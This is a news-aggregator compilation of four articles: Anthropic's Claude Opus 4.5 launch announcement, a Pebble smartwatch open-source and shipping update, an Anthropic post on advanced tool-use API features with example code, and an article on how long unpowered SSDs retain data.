10 interesting stories served every morning and every evening.
Our newest model, Claude Opus 4.5, is available today. It’s intelligent, efficient, and the best model in the world for coding, agents, and computer use. It’s also meaningfully better at everyday tasks like deep research and working with slides and spreadsheets. Opus 4.5 is a step forward in what AI systems can do, and a preview of larger changes to how work gets done. Claude Opus 4.5 is state-of-the-art on tests of real-world software engineering:Opus 4.5 is available today on our apps, our API, and on all three major cloud platforms. If you’re a developer, simply use claude-opus-4-5-20251101 via the Claude API. Pricing is now $5/$25 per million tokens—making Opus-level capabilities accessible to even more users, teams, and enterprises.Alongside Opus, we’re releasing updates to the Claude Developer Platform, Claude Code, and our consumer apps. There are new tools for longer-running agents and new ways to use Claude in Excel, Chrome, and on desktop. In the Claude apps, lengthy conversations no longer hit a wall. See our product-focused section below for details.As our Anthropic colleagues tested the model before release, we heard remarkably consistent feedback. Testers noted that Claude Opus 4.5 handles ambiguity and reasons about tradeoffs without hand-holding. They told us that, when pointed at a complex, multi-system bug, Opus 4.5 figures out the fix. They said that tasks that were near-impossible for Sonnet 4.5 just a few weeks ago are now within reach. Overall, our testers told us that Opus 4.5 just “gets it.”Many of our customers with early access have had similar experiences. Here are some examples of what they told us:Opus models have always been “the real SOTA” but have been cost prohibitive in the past. Claude Opus 4.5 is now at a price point where it can be your go-to model for most tasks. It’s the clear winner and exhibits the best frontier task planning and tool calling we’ve seen yet.Claude Opus 4.5 delivers high-quality code and excels at powering heavy-duty agentic workflows with GitHub Copilot. Early testing shows it surpasses internal coding benchmarks while cutting token usage in half, and is especially well-suited for tasks like code migration and code refactoring.Claude Opus 4.5 beats Sonnet 4.5 and competition on our internal benchmarks, using fewer tokens to solve the same problems. At scale, that efficiency compounds.Claude Opus 4.5 delivers frontier reasoning within Lovable’s chat mode, where users plan and iterate on projects. Its reasoning depth transforms planning—and great planning makes code generation even better.Claude Opus 4.5 excels at long-horizon, autonomous tasks, especially those that require sustained reasoning and multi-step execution. In our evaluations it handled complex workflows with fewer dead-ends. On Terminal Bench it delivered a 15% improvement over Sonnet 4.5, a meaningful gain that becomes especially clear when using Warp’s Planning Mode.Claude Opus 4.5 achieved state-of-the-art results for complex enterprise tasks on our benchmarks, outperforming previous models on multi-step reasoning tasks that combine information retrieval, tool use, and deep analysis.Claude Opus 4.5 delivers measurable gains where it matters most: stronger results on our hardest evaluations and consistent performance through 30-minute autonomous coding sessions.Claude Opus 4.5 represents a breakthrough in self-improving AI agents. For office automation, our agents were able to autonomously refine their own capabilities—achieving peak performance in 4 iterations while other models couldn’t match that quality after 10.Claude Opus 4.5 is a notable improvement over the prior Claude models inside Cursor, with improved pricing and intelligence on difficult coding tasks.Claude Opus 4.5 is yet another example of Anthropic pushing the frontier of general intelligence. It performs exceedingly well across difficult coding tasks, showcasing long-term goal-directed behavior.Claude Opus 4.5 delivered an impressive refactor spanning two codebases and three coordinated agents. It was very thorough, helping develop a robust plan, handling the details and fixing tests. A clear step forward from Sonnet 4.5.Claude Opus 4.5 handles long-horizon coding tasks more efficiently than any model we’ve tested. It achieves higher pass rates on held-out tests while using up to 65% fewer tokens, giving developers real cost control without sacrificing quality.We’ve found that Opus 4.5 excels at interpreting what users actually want, producing shareable content on the first try. Combined with its speed, token efficiency, and surprisingly low cost, it’s the first time we’re making Opus available in Notion Agent.Claude Opus 4.5 excels at long-context storytelling, generating 10-15 page chapters with strong organization and consistency. It’s unlocked use cases we couldn’t reliably deliver before.Claude Opus 4.5 sets a new standard for Excel automation and financial modeling. Accuracy on our internal evals improved 20%, efficiency rose 15%, and complex tasks that once seemed out of reach became achievable.Claude Opus 4.5 is the only model that nails some of our hardest 3D visualizations. Polished design, tasteful UX, and excellent planning & orchestration - all with more efficient token usage. Tasks that took previous models 2 hours now take thirty minutes.Claude Opus 4.5 catches more issues in code reviews without sacrificing precision. For production code review at scale, that reliability matters.Based on testing with Junie, our coding agent, Claude Opus 4.5 outperforms Sonnet 4.5 across all benchmarks. It requires fewer steps to solve tasks and uses fewer tokens as a result. This indicates that the new model is more precise and follows instructions more effectively — a direction we’re very excited about.The effort parameter is brilliant. Claude Opus 4.5 feels dynamic rather than overthinking, and at lower effort delivers the same quality we need while being dramatically more efficient. That control is exactly what our SQL workflows demand.We’re seeing 50% to 75% reductions in both tool calling errors and build/lint errors with Claude Opus 4.5. It consistently finishes complex tasks in fewer iterations with more reliable execution.Claude Opus 4.5 is smooth, with none of the rough edges we’ve seen from other frontier models. The speed improvements are remarkable.We give prospective performance engineering candidates a notoriously difficult take-home exam. We also test new models on this exam as an internal benchmark. Within our prescribed 2-hour time limit, Claude Opus 4.5 scored higher than any human candidate ever1.The take-home test is designed to assess technical ability and judgment under time pressure. It doesn’t test for other crucial skills candidates may possess, like collaboration, communication, or the instincts that develop over years. But this result—where an AI model outperforms strong candidates on important technical skills—raises questions about how AI will change engineering as a profession. Our Societal Impacts and Economic Futures research is aimed at understanding these kinds of changes across many fields. We plan to share more results soon.Software engineering isn’t the only area on which Claude Opus 4.5 has improved. Capabilities are higher across the board—Opus 4.5 has better vision, reasoning, and mathematics skills than its predecessors, and it is state-of-the-art in many domains:2Opus 4.5 writes better code, leading across 7 out of 8 programming languages on SWE-bench Multilingual.Opus 4.5 can solve challenging coding problems with ease with a 10.6% jump over Sonnet 4.5 on Aider Polyglot.Opus 4.5 improves on frontier agentic search with a significant jump on BrowseComp-Plus.Opus 4.5 stays on track over the long haul earning 29% more than Sonnet 4.5 on Vending-Bench.The model’s capabilities outpace some of the benchmarks we use in our tests. A common benchmark for agentic capabilities is τ2-bench, which measures the performance of agents in real-world, multi-turn tasks. In one scenario, models have to act as an airline service agent helping a distressed customer. The benchmark expects models to refuse a modification to a basic economy booking since the airline doesn’t allow changes to that class of tickets. Instead, Opus 4.5 found an insightful (and legitimate) way to solve the problem: upgrade the cabin first, then modify the flights.Let me think about what options I have within my policy:
1. Modify flights - Basic economy cannot be modified. This is clear in the policy.
2. Change cabin - Wait, let me check this option! The policy says:
“In other cases, all reservations, including basic economy, can change cabin without changing the flights.”
But he wants to change the flights, not just the cabin. However, what if we:
- Change the cabin first (which IS allowed for basic economy), then
- Change the flights (which is allowed for non-basic economy)
So the strategy could be:
1. Upgrade his cabin from basic economy to economy (or business)
2. Then modify the flights to be 2 days later
This would cost more money, but it’s a legitimate path within the policy!The benchmark technically scored this as a failure because Claude’s way of helping the customer was unanticipated. But this kind of creative problem solving is exactly what we’ve heard about from our testers and customers—it’s what makes Claude Opus 4.5 feel like a meaningful step forward.In other contexts, finding clever paths around intended constraints could count as reward hacking—where models “game” rules or objectives in unintended ways. Preventing such misalignment is one of the objectives of our safety testing, discussed in the next section.As we state in our system card, Claude Opus 4.5 is the most robustly aligned model we have released to date and, we suspect, the best-aligned frontier model by any developer. It continues our trend towards safer and more secure models:In our evaluation, “concerning behavior” scores measure a very wide range of misaligned behavior, including both cooperation with human misuse and undesirable actions that the model takes at its own initiative [3].Our customers often use Claude for critical tasks. They want to be assured that, in the face of malicious attacks by hackers and cybercriminals, Claude has the training and the “street smarts” to avoid trouble. With Opus 4.5, we’ve made substantial progress in robustness against prompt injection attacks, which smuggle in deceptive instructions to fool the model into harmful behavior. Opus 4.5 is harder to trick with prompt injection than any other frontier model in the industry:Note that this benchmark includes only very strong prompt injection attacks. It was developed and run by Gray Swan.You can find a detailed description of all our capability and safety evaluations in the Claude Opus 4.5 system card.New on the Claude Developer PlatformAs models get smarter, they can solve problems in fewer steps: less backtracking, less redundant exploration, less verbose reasoning. Claude Opus 4.5 uses dramatically fewer tokens than its predecessors to reach similar or better outcomes.But different tasks call for different tradeoffs. Sometimes developers want a model to keep thinking about a problem; sometimes they want something more nimble. With our new effort parameter on the Claude API, you can decide to minimize time and spend or maximize capability.Set to a medium effort level, Opus 4.5 matches Sonnet 4.5’s best score on SWE-bench Verified, but uses 76% fewer output tokens. At its highest effort level, Opus 4.5 exceeds Sonnet 4.5 performance by 4.3 percentage points—while using 48% fewer tokens.With effort control, context compaction, and advanced tool use, Claude Opus 4.5 runs longer, does more, and requires less intervention.Our context management and memory capabilities can dramatically boost performance on agentic tasks. Opus 4.5 is also very effective at managing a team of subagents, enabling the construction of complex, well-coordinated multi-agent systems. In our testing, the combination of all these techniques boosted Opus 4.5’s performance on a deep research evaluation by almost 15 percentage points4.We’re making our Developer Platform more composable over time. We want to give you the building blocks to construct exactly what you need, with full control over efficiency, tool use, and context management.
Products like Claude Code show what’s possible when the kinds of upgrades we’ve made to the Claude Developer Platform come together. Claude Code gains two upgrades with Opus 4.5. Plan Mode now builds more precise plans and executes more thoroughly—Claude asks clarifying questions upfront, then builds a user-editable plan.md file before executing.Claude Code is also now available in our desktop app, letting you run multiple local and remote sessions in parallel: perhaps one agent fixes bugs, another researches GitHub, and a third updates docs.For Claude app users, long conversations no longer hit a wall—Claude automatically summarizes earlier context as needed, so you can keep the chat going. Claude for Chrome, which lets Claude handle tasks across your browser tabs, is now available to all Max users. We announced Claude for Excel in October, and as of today we’ve expanded beta access to all Max, Team, and Enterprise users. Each of these updates takes advantage of Claude Opus 4.5’s market-leading performance in using computers, spreadsheets, and handling long-running tasks.For Claude and Claude Code users with access to Opus 4.5, we’ve removed Opus-specific caps. For Max and Team Premium users, we’ve increased overall usage limits, meaning you’ll have roughly the same number of Opus tokens as you previously had with Sonnet. We’re updating usage limits to make sure you’re able to use Opus 4.5 for daily work. These limits are specific to Opus 4.5. As future models surpass it, we expect to update limits as needed.
...
Read the original on www.anthropic.com »
* Yesterday, Pebble watch software was ~95% open source. Today, it’s 100% open source. You can download, compile and run all the software you need to use your Pebble. We just published the source code for the new Pebble mobile app!
* Pebble Appstore now has a publicly available backup and supports multiple feeds, providing long term reliability through decentralization. We’ve launched our own feed and Developer Dashboard.
* Pebble Time 2 schedule update (aiming to begin shipping in January, with most arriving on wrists in March/April)
* New Tick Talk episode #4 is up, with Pebble Time 2 demos!
Pre-production Pebble Time 2 (Black/Red colourway) in all its glory
Over the last year, and especially in the last week, I’ve chatted with tons of people in the Pebble community. One of the main questions people have is ‘how do I know that my new Pebble watch will continue to work long into the future?’. It’s an extremely valid question and concern - one that I share as a fellow Pebble wearer. I called this out specifically in my blog post announcing the relaunch in January 2025. How is this time round going to be different from last time?
There are two pieces to making Pebble sustainable long term - hardware and software.
Nothing lasts forever, especially an inexpensive gadget like a Pebble. We want to be able to keep manufacturing these watches long into the future - mostly because I will always want one on my wrist! The company I set up to relaunch Pebble, Core Devices, is self funded, built without investors, and extremely lean. As long as we stay profitable (ie we don’t lose money), we will continue to manufacture new watches.
We’re also making sure that our new watches are more repairable than old Pebble watches. The back cover of Pebble Time 2 is screwed in. You can remove the back cover and replace the battery.
We’ve also published electrical and mechanical design files for Pebble 2 Duo. Yes, you can download the schematic (includes KiCad project files) right now on Github! This should give you a nice jumpstart to designing your own PebbleOS-compatible device.
Last time round, barely any of the Pebble software was open source. This made it very hard for the Pebble community to make improvements to their watches after the company behind Pebble shut down. Things are different now! This whole relaunch came about primarily because Google open sourced PebbleOS (thank you!). Yesterday, the software that powers Pebble watches was around 95% open source. As of today, it’s now 100%. This means that if Core Devices were to disappear into a black hole, you have all the source code you need to build, run and improve the software behind your Pebble.
I confess that I misunderstood why 95% was much less sustainable than 100% until recently. I discuss this in more detail in my latest Tick Talk episode (check it out). Long story short - I’m an Android user and was happy to sideload the old Pebble APK on my phone, but iPhone and other Android users have basically been stuck without an easily available Pebble mobile companion app for years.
Here’s how we’re making sure the 3 main Pebble software components are open source and guaranteed to work long into the future:
PebbleOS - software that runs on your watch itself. This has been 100% open source since January and we’ve committed to open sourcing all the improvements we’ve made → github.com/coredevices/PebbleOS. You can download the source code, compile PebbleOS and easily install it over Bluetooth on your new Pebble. Textbook definition of open source!
Pebble mobile companion app - the app that for your iPhone or Android. Without the app, your Pebble is basically a paperweight. When the Pebble Tech Corp died, the lack of an open source mobile app made it difficult for anyone to continue to use their watches. We had to build an entirely new app (get it here). Today, our app is now 100% open source on Github - ensuring that what happened before cannot happen again. Want to learn more about how we built the new app cross platform using Kotlin Multiplatform? Watch Steve’s presentation at Droidcon.
Developer tools and Pebble Appstore - this software enables people to build and share their watchapps and watchfaces.
In the case of dev tools, just being open source is not enough. They needed to be updated to work on modern computers. Before we made improvements, the state of the art of Pebble app development was using an Ubuntu virtualbox VM with Python2! Over the summer, our incredibly productive intern upgraded all the SDK and dev tools and created a new way to develop Pebble apps in the browser. You should check them out!
Then there’s the Pebble Appstore. This is a collection of nearly 15,000 watchfaces and watchapps that you - the Pebble community - developed between 2012 and July 2018. When Fitbit pulled the plug on the original Pebble Appstore, the Rebble Foundation downloaded a copy of all the apps and faces, and set up a new web service to let users of the old Pebble app continue to download and use watchfaces. This was an incredible effort, one that I have used thousands of times and am a happy paying subscriber. But it’s still centralized - if their server disappears, there is no freely available backup.
To compensate for that, today we’re launching two new things:
* The Pebble mobile app will soon (later this week) be able to subscribe to multiple appstore ‘feeds’. This is similar to open source package managers like pip, AUR, APT, etc. Anyone can create a Pebble-compatible appstore feed and users will be able to browse apps from that feed in the Pebble mobile app.
* We’ve created our own Pebble Appstore feed (appstore-api.repebble.com) and new Developer Dashboard. Our feed (fyi powered by 100% new software) is configured to back up an archive of all apps and faces to Archive.org (backup will gradually complete over the next week). Today, our feed only has a subset of all Pebble watchfaces and apps (thank you aveao for creating Pebble Archive!). Developers - you can upload your existing or new apps right now! We hope that this sets a standard for openness and we encourage all feeds to publish a freely and publicly available archive.
Important to note - developers will still be able to charge money for their apps and faces, using Kiezel pay or other services. This change does not preclude them from doing that, in fact it makes it even easier - I could see some developers creating a paid-only feed. As I recently wrote, we’re also working on other ways for Pebble developers to earn money by publishing fun, beautiful and creative Pebble apps.
Another important note - some binary blobs and other non-free software components are used today in PebbleOS and the Pebble mobile app (ex: the heart rate sensor on PT2 , Memfault library, and others). Optional non-free web services, like Wispr-flow API speech recognizer, are also used. These non-free software components are not required - you can compile and run Pebble watch software without them. This will always be the case. More non-free software components may appear in our software in the future. The core Pebble watch software stack (everything you need to use your Pebble watch) will always be open source.
Pre-production Pebble Time 2. These watches are not final quality! We are still tweaking and tuning everything.
We’re currently in the middle of Pebble Time 2 design verification test (DVT) phase. After we finish that, we go into production verification test (PVT) and then mass production (MP). So far, things are proceeding according to the schedule update I shared last month but that is extraordinarily subject to change. We still have a lot of testing (especially waterproof and environmental) to go. If we find problems (which is likely) we will push the schedule back to make improvements to the product.
The one major complicating factor is the timing of Chinese New Year (CNY). It’s early next year - factories will shut down for 3 weeks starting around the end of January. After restarting, things always take a week or two to get back to full speed.
We are trying our best to get into mass production and ship out at most several thousand Pebble Time 2s before CNY. It’s going to be very tight 🤞. More likely is that production will begin after CNY, then we need to transfer the watches to our fulfillment center, and ship them out. Realistically, at this time we’re forecasting that the majority of people will receive their PT2 in March and April. Please keep in mind that things may still change.
There will be 4 colour options for PT2 - black/black, black/red, silver/blue, silver/(white most likely). Let me be crystal very clear - no one has picked a colour yet 😃. In a few weeks, I will send out an email asking everyone who pre-ordered a Pebble Time 2 to select which colour they would like to receive. Please do not email us asking when this email will be sent out. No one has been invited yet to do this. I will post here after all emails have gone out.
On a related note, I am extremely happy that we built and shipped Pebble 2 Duo. Not only is it an awesome watch, it was also a phenomenal way for us to exercise our production muscles and ease back into the systematic flow of building and shipping smartwatches.
A video is worth a million words - so I encourage you to watch me demo Pebble Time 2 watches I just received this week. Keep in mind these watches are PRE-PRODUCTION which means they parts have imperfect qualities! Subject to change!
The video below opens to the part of the video where I do the demo.
...
Read the original on ericmigi.com »
The future of AI agents is one where models work seamlessly across hundreds or thousands of tools. An IDE assistant that integrates git operations, file manipulation, package managers, testing frameworks, and deployment pipelines. An operations coordinator that connects Slack, GitHub, Google Drive, Jira, company databases, and dozens of MCP servers simultaneously. To build effective agents, they need to work with unlimited tool libraries without stuffing every definition into context upfront. Our blog article on using code execution with MCP discussed how tool results and definitions can sometimes consume 50,000+ tokens before an agent reads a request. Agents should discover and load tools on-demand, keeping only what’s relevant for the current task.Agents also need the ability to call tools from code. When using natural language tool calling, each invocation requires a full inference pass, and intermediate results pile up in context whether they’re useful or not. Code is a natural fit for orchestration logic, such as loops, conditionals, and data transformations. Agents need the flexibility to choose between code execution and inference based on the task at hand.Agents also need to learn correct tool usage from examples, not just schema definitions. JSON schemas define what’s structurally valid, but can’t express usage patterns: when to include optional parameters, which combinations make sense, or what conventions your API expects.Today, we’re releasing three features that make this possible:Tool Search Tool, which allows Claude to use search tools to access thousands of tools without consuming its context windowProgrammatic Tool Calling, which allows Claude to invoke tools in a code execution environment reducing the impact on the model’s context windowTool Use Examples, which provides a universal standard for demonstrating how to effectively use a given toolIn internal testing, we’ve found these features have helped us build things that wouldn’t have been possible with conventional tool use patterns. For example, Claude for Excel uses Programmatic Tool Calling to read and modify spreadsheets with thousands of rows without overloading the model’s context window.Based on our experience, we believe these features open up new possibilities for what you can build with Claude.MCP tool definitions provide important context, but as more servers connect, those tokens can add up. Consider a five-server setup:That’s 58 tools consuming approximately 55K tokens before the conversation even starts. Add more servers like Jira (which alone uses ~17K tokens) and you’re quickly approaching 100K+ token overhead. At Anthropic, we’ve seen tool definitions consume 134K tokens before optimization.But token cost isn’t the only issue. The most common failures are wrong tool selection and incorrect parameters, especially when tools have similar names like notification-send-user vs. notification-send-channel.Instead of loading all tool definitions upfront, the Tool Search Tool discovers tools on-demand. Claude only sees the tools it actually needs for the current task.Tool Search Tool preserves 191,300 tokens of context compared to 122,800 with Claude’s traditional approach.This represents an 85% reduction in token usage while maintaining access to your full tool library. Internal testing showed significant accuracy improvements on MCP evaluations when working with large tool libraries. Opus 4 improved from 49% to 74%, and Opus 4.5 improved from 79.5% to 88.1% with Tool Search Tool enabled.The Tool Search Tool lets Claude dynamically discover tools instead of loading all definitions upfront. You provide all your tool definitions to the API, but mark tools with defer_loading: true to make them discoverable on-demand. Deferred tools aren’t loaded into Claude’s context initially. Claude only sees the Tool Search Tool itself plus any tools with defer_loading: false (your most critical, frequently-used tools).When Claude needs specific capabilities, it searches for relevant tools. The Tool Search Tool returns references to matching tools, which get expanded into full definitions in Claude’s context.For example, if Claude needs to interact with GitHub, it searches for “github,” and only github.createPullRequest and github.listIssues get loaded—not your other 50+ tools from Slack, Jira, and Google Drive.This way, Claude has access to your full tool library while only paying the token cost for tools it actually needs.Prompt caching note: Tool Search Tool doesn’t break prompt caching because deferred tools are excluded from the initial prompt entirely. They’re only added to context after Claude searches for them, so your system prompt and core tool definitions remain cacheable.{
“tools”: [
// Include a tool search tool (regex, BM25, or custom)
{“type”: “tool_search_tool_regex_20251119″, “name”: “tool_search_tool_regex”},
// Mark tools for on-demand discovery
“name”: “github.createPullRequest”,
“description”: “Create a pull request”,
“input_schema”: {…},
“defer_loading”: true
// … hundreds more deferred tools with defer_loading: true
For MCP servers, you can defer loading entire servers while keeping specific high-use tools loaded:{
“type”: “mcp_toolset”,
“mcp_server_name”: “google-drive”,
“default_config”: {“defer_loading”: true}, # defer loading the entire server
“configs”: {
“search_files”: {
“defer_loading”: false
} // Keep most used tool loaded
}The Claude Developer Platform provides regex-based and BM25-based search tools out of the box, but you can also implement custom search tools using embeddings or other strategies.When to use the Tool Search ToolLike any architectural decision, enabling the Tool Search Tool involves trade-offs. The feature adds a search step before tool invocation, so it delivers the best ROI when the context savings and accuracy improvements outweigh additional latency.Use it when:All tools used frequently in every sessionTraditional tool calling creates two fundamental problems as workflows become more complex:Context pollution from intermediate results: When Claude analyzes a 10MB log file for error patterns, the entire file enters its context window, even though Claude only needs a summary of error frequencies. When fetching customer data across multiple tables, every record accumulates in context regardless of relevance. These intermediate results consume massive token budgets and can push important information out of the context window entirely.Inference overhead and manual synthesis: Each tool call requires a full model inference pass. After receiving results, Claude must “eyeball” the data to extract relevant information, reason about how pieces fit together, and decide what to do next—all through natural language processing. A five tool workflow means five inference passes plus Claude parsing each result, comparing values, and synthesizing conclusions. This is both slow and error-prone.Programmatic Tool Calling enables Claude to orchestrate tools through code rather than through individual API round-trips. Instead of Claude requesting tools one at a time with each result being returned to its context, Claude writes code that calls multiple tools, processes their outputs, and controls what information actually enters its context window.Claude excels at writing code and by letting it express orchestration logic in Python rather than through natural language tool invocations, you get more reliable, precise control flow. Loops, conditionals, data transformations, and error handling are all explicit in code rather than implicit in Claude’s reasoning.Consider a common business task: “Which team members exceeded their Q3 travel budget?“You have three tools available:For each person, fetch their Q3 expenses → 20 tool calls, each returning 50-100 line items (flights, hotels, meals, receipts)All of this enters Claude’s context: 2,000+ expense line items (50 KB+)Claude manually sums each person’s expenses, looks up their budget, compares expenses against budget limitsMore round-trips to the model, significant context consumptionInstead of each tool result returning to Claude, Claude writes a Python script that orchestrates the entire workflow. The script runs in the Code Execution tool (a sandboxed environment), pausing when it needs results from your tools. When you return tool results via the API, they’re processed by the script rather than consumed by the model. The script continues executing, and Claude only sees the final output.Programmatic Tool Calling enables Claude to orchestrate tools through code rather than through individual API round-trips, allowing for parallel tool execution.Here’s what Claude’s orchestration code looks like for the budget compliance task:team = await get_team_members(“engineering”)
# Fetch budgets for each unique level
levels = list(set(m[“level”] for m in team))
budget_results = await asyncio.gather(*[
get_budget_by_level(level) for level in levels
# Create a lookup dictionary: {“junior”: budget1, “senior”: budget2, …}
budgets = {level: budget for level, budget in zip(levels, budget_results)}
# Fetch all expenses in parallel
expenses = await asyncio.gather(*[
get_expenses(m[“id”], “Q3″) for m in team
# Find employees who exceeded their travel budget
exceeded = []
for member, exp in zip(team, expenses):
budget = budgets[member[“level”]]
total = sum(e[“amount”] for e in exp)
if total > budget[“travel_limit”]:
exceeded.append({
“name”: member[“name”],
“spent”: total,
“limit”: budget[“travel_limit”]
print(json.dumps(exceeded))Claude’s context receives only the final result: the two to three people who exceeded their budget. The 2,000+ line items, the intermediate sums, and the budget lookups do not affect Claude’s context, reducing consumption from 200KB of raw expense data to just 1KB of results.Token savings: By keeping intermediate results out of Claude’s context, PTC dramatically reduces token consumption. Average usage dropped from 43,588 to 27,297 tokens, a 37% reduction on complex research tasks.Reduced latency: Each API round-trip requires model inference (hundreds of milliseconds to seconds). When Claude orchestrates 20+ tool calls in a single code block, you eliminate 19+ inference passes. The API handles tool execution without returning to the model each time.Improved accuracy: By writing explicit orchestration logic, Claude makes fewer errors than when juggling multiple tool results in natural language. Internal knowledge retrieval improved from 25.6% to 28.5%; GIA benchmarks from 46.5% to 51.2%.Production workflows involve messy data, conditional logic, and operations that need to scale. Programmatic Tool Calling lets Claude handle that complexity programmatically while keeping its focus on actionable results rather than raw data processing.Add code_execution to tools, and set allowed_callers to opt-in tools for programmatic execution:{
“tools”: [
“type”: “code_execution_20250825″,
“name”: “code_execution”
“name”: “get_team_members”,
“description”: “Get all members of a department…”,
“input_schema”: {…},
“allowed_callers”: [“code_execution_20250825″] # opt-in to programmatic tool calling
“name”: “get_expenses”,
“name”: “get_budget_by_level”,
}The API converts these tool definitions into Python functions that Claude can call.Instead of requesting tools one at a time, Claude generates Python code:{
“type”: “server_tool_use”,
“id”: “srvtoolu_abc”,
“name”: “code_execution”,
“input”: {
“code”: “team = get_team_members(‘engineering’)\n…” # the code example above
}When the code calls get_expenses(), you receive a tool request with a caller field:You provide the result, which is processed in the Code Execution environment rather than Claude’s context. This request-response cycle repeats for each tool call in the code.When the code finishes running, only the results of the code are returned to Claude:This is all Claude sees, not the 2000+ expense line items processed along the way.When to use Programmatic Tool CallingProgrammatic Tool Calling adds a code execution step to your workflow. This extra overhead pays off when the token savings, latency improvements, and accuracy gains are substantial.Processing large datasets where you only need aggregates or summariesRunning multi-step workflows with three or more dependent tool callsFiltering, sorting, or transforming tool results before Claude sees themRunning parallel operations across many items (checking 50 endpoints, for example)Working on tasks where Claude should see and reason about all intermediate resultsJSON Schema excels at defining structure–types, required fields, allowed enums–but it can’t express usage patterns: when to include optional parameters, which combinations make sense, or what conventions your API expects.Format ambiguity: Should due_date use “2024-11-06”, “Nov 6, 2024″, or “2024-11-06T00:00:00Z”?ID conventions: Is reporter.id a UUID, “USR-12345″, or just “12345”?Parameter correlations: How do escalation.level and escalation.sla_hours relate to priority?These ambiguities can lead to malformed tool calls and inconsistent parameter usage.Tool Use Examples let you provide sample tool calls directly in your tool definitions. Instead of relying on schema alone, you show Claude concrete usage patterns:{
“name”: “create_ticket”,
“input_schema”: { /* same schema as above */ },
“input_examples”: [
“title”: “Login page returns 500 error”,
“priority”: “critical”,
“labels”: [“bug”, “authentication”, “production”],
“reporter”: {
“id”: “USR-12345″,
“name”: “Jane Smith”,
“contact”: {
“email”: “jane@acme.com”,
“phone”: “+1-555-0123″
“due_date”: “2024-11-06″,
“escalation”: {
“level”: 2,
“notify_manager”: true,
“sla_hours”: 4
“title”: “Add dark mode support”,
“labels”: [“feature-request”, “ui”],
“reporter”: {
“id”: “USR-67890″,
“name”: “Alex Chen”
“title”: “Update API documentation”
}From these three examples, Claude learns:Nested structure patterns: How to construct the reporter object with its nested contact objectOptional parameter correlations: Critical bugs have full contact info + escalation with tight SLAs; feature requests have reporter but no contact/escalation; internal tasks have title onlyIn our own internal testing, tool use examples improved accuracy from 72% to 90% on complex parameter handling.When to use Tool Use ExamplesTool Use Examples add tokens to your tool definitions, so they’re most valuable when accuracy improvements outweigh the additional cost.Tools with many optional parameters and inclusion patterns matterAPIs with domain-specific conventions not captured in schemasSimilar tools where examples clarify which one to use (e.g., create_ticket vs create_incident)Standard formats like URLs or emails that Claude already understandsBuilding agents that take real-world actions means handling scale, complexity, and precision simultaneously. These three features work together to solve different bottlenecks in tool use workflows. Here’s how to combine them effectively.Not every agent needs to use all three features for a given task. Start with your biggest bottleneck:This focused approach lets you address the specific constraint limiting your agent’s performance, rather than adding complexity upfront.Then layer additional features as needed. They’re complementary: Tool Search Tool ensures the right tools are found, Programmatic Tool Calling ensures efficient execution, and Tool Use Examples ensure correct invocation.Set up Tool Search Tool for better discoveryTool search matches against names and descriptions, so clear, descriptive definitions improve discovery accuracy.// Good
“name”: “search_customer_orders”,
“description”: “Search for customer orders by date range, status, or total amount. Returns order details including items, shipping, and payment info.”
// Bad
“name”: “query_db_orders”,
“description”: “Execute order query”
}Add system prompt guidance so Claude knows what’s available:You have access to tools for Slack messaging, Google Drive file management,
Jira ticket tracking, and GitHub repository operations. Use the tool search
to find specific capabilities.Keep your three to five most-used tools always loaded, defer the rest. This balances immediate access for common operations with on-demand discovery for everything else.Since Claude writes code to parse tool outputs, document return formats clearly. This helps Claude write correct parsing logic:{
“name”: “get_orders”,
“description”: “Retrieve orders for a customer.
Returns:
List of order objects, each containing:
- id (str): Order identifier
- total (float): Order total in USD
- status (str): One of ‘pending’, ‘shipped’, ‘delivered’
- items (list): Array of {sku, quantity, price}
- created_at (str): ISO 8601 timestamp”
}See below for opt-in tools that benefit from programmatic orchestration:Tools that can run in parallel (independent operations)Set up Tool Use Examples for parameter accuracyUse realistic data (real city names, plausible prices, not “string” or “value”)Keep it concise: 1-5 examples per toolFocus on ambiguity (only add examples where correct usage isn’t obvious from schema)These features are available in beta. To enable them, add the beta header and include the tools you need:client.beta.messages.create(
betas=[“advanced-tool-use-2025-11-20”],
model=“claude-sonnet-4-5-20250929”,
max_tokens=4096,
...
Read the original on www.anthropic.com »
After a 7-year corporate stint, Tanveer found his love for writing and tech too much to resist. An MBA in Marketing and the owner of a PC building business, he writes on PC hardware, technology, and Windows. When not scouring the web for ideas, he can be found building PCs, watching anime, or playing Smash Karts on his RTX 3080 (sigh).
After a 7-year corporate stint, Tanveer found his love for writing and tech too much to resist. An MBA in Marketing and the owner of a PC building business, he writes on PC hardware, technology, and Windows. When not scouring the web for ideas, he can be found building PCs, watching anime, or playing Smash Karts on his RTX 3080 (sigh).
SSDs have all but replaced hard drives when it comes to primary storage. They’re orders of magnitude faster, more convenient, and consume less power than mechanical hard drives. That said, if you’re also using SSDs for cold storage, expecting the drives lying in your drawer to work perfectly after years, you might want to rethink your strategy. Your reliable SSD could suffer from corrupted or lost data if left unpowered for extended periods. This is why many users don’t consider SSDs a reliable long-term storage medium, and prefer using hard drives, magnetic tape, or M-Disc instead.
Your SSD data isn’t as permanent as you think
Unlike hard drives that magnetize spinning discs to store data, SSDs modify the electrical charge in NAND flash cells to represent 0 and 1. NAND flash retains data in underlying transistors even when power is removed, similar to other forms of non-volatile memory. However, the duration for which your SSD can retain data without power is the key here. Even the cheapest SSDs, say those with QLC NAND, can safely store data for about a year of being completely unpowered. More expensive TLC NAND can retain data for up to 3 years, while MLC and SLC NAND are good for 5 years and 10 years of unpowered storage, respectively.
The problem is that most consumer SSDs use only TLC or QLC NAND, so users who leave their SSDs unpowered for over a year are risking the integrity of their data. The reliability of QLC NAND has improved over the years, so you should probably consider 2–3 years of unpowered usage as the guardrails. Without power, the voltage stored in the NAND cells can be lost, either resulting in missing data or completely useless drives.
This data retention deficiency of consumer SSDs makes them an unreliable medium for long-term data storage, especially for creative professionals and researchers. HDDs can suffer from bit rot, too, due to wear and tear, but they’re still more resistant to power loss. If you haven’t checked your archives in a while, I’d recommend doing so at the earliest.
But, most people don’t need to worry about it
The scenario I described above isn’t relevant to people outside enterprise, enthusiast, and solopreneur usage. The need to store tons of data for years on drives that aren’t plugged in isn’t a concern for most people, who use one or two SSDs on their PC that might be left without power for only a few months, at the maximum. You’ve probably lost data on your SSD due to a rare power surge or a faulty drive rather than voltage loss. Some factors, like temperature and the quality of the underlying NAND flash, can accelerate this voltage loss.
SSDs aren’t eternal, even if you keep them powered on forever. The limited write cycles of NAND flash will eventually bring an SSD to the end of its lifecycle, but the majority of users will probably replace the drive before that ever happens. So, you don’t need to worry about writing too much data to your SSD or leaving your PC turned off for days, weeks, or even months. Just don’t trust an unpowered SSD that’s gathering dust in the house for years, which brings me to my next point.
